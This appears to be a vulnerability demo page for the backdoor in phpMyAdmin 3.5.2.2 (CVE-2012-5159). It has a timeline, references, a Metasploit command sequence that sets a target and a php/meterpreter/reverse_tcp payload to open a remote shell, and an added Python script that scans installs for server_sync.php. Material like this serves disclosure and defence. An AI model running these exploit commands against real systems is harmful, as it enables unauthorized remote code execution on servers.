CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor Metasploit Demo

Timeline :

Backdoor discovered by Passerby on 2012-09-25
Vendor notified of the backdoor on 2012-09-25
Metasploit PoC provided on 2012-09-25

PoC provided by :

hdm

Reference(s) :

PMASA-2012-5
CVE-2012-5159
BID-51211

Affected version(s) :

phpMyAdmin-3.5.2.2-all-languages.zip downloaded from the cdnetworks-kr-1 SourceForge.net mirror.

Tested on Ubuntu 11.10 i386 with :

phpMyAdmin-3.5.2.2-all-languages.zip

Description :

This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.

Commands :

use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid
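
Defender-side check, added here as an example (not code from the original post, Metasploit or phpMyAdmin): it looks for the backdoor file named in the title, server_sync.php, inside a downloaded zip or an extracted install. It assumes a clean release ships no file with that name; the paths passed on the command line are whatever you want to inspect.

```python
"""Added example: look for the server_sync.php backdoor file in a phpMyAdmin
download (.zip) or in an extracted install directory."""
import os
import sys
import zipfile

BACKDOOR_NAME = "server_sync.php"  # file name taken from the post title


def scan_zip(zip_path):
    """Return archive entries whose base name is server_sync.php."""
    with zipfile.ZipFile(zip_path) as zf:
        return sorted(
            name for name in zf.namelist()
            if os.path.basename(name).lower() == BACKDOOR_NAME
        )


def scan_tree(root):
    """Return paths under root whose file name is server_sync.php."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower() == BACKDOOR_NAME:
                hits.append(os.path.join(dirpath, fname))
    return sorted(hits)


def scan(path):
    """Dispatch on what the path is: a directory or a zip archive."""
    if os.path.isdir(path):
        return scan_tree(path)
    if zipfile.is_zipfile(path):
        return scan_zip(path)
    raise ValueError("not a directory or zip archive: %s" % path)


if __name__ == "__main__":
    status = 0
    for target in sys.argv[1:]:
        for hit in scan(target):
            print("SUSPECT %s: %s" % (target, hit))
            status = 1
    sys.exit(status)  # non-zero exit when any suspect file was found
```

Run it against both the archive you downloaded and the deployed web root; a hit means the copy should be replaced with one from a trusted source.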
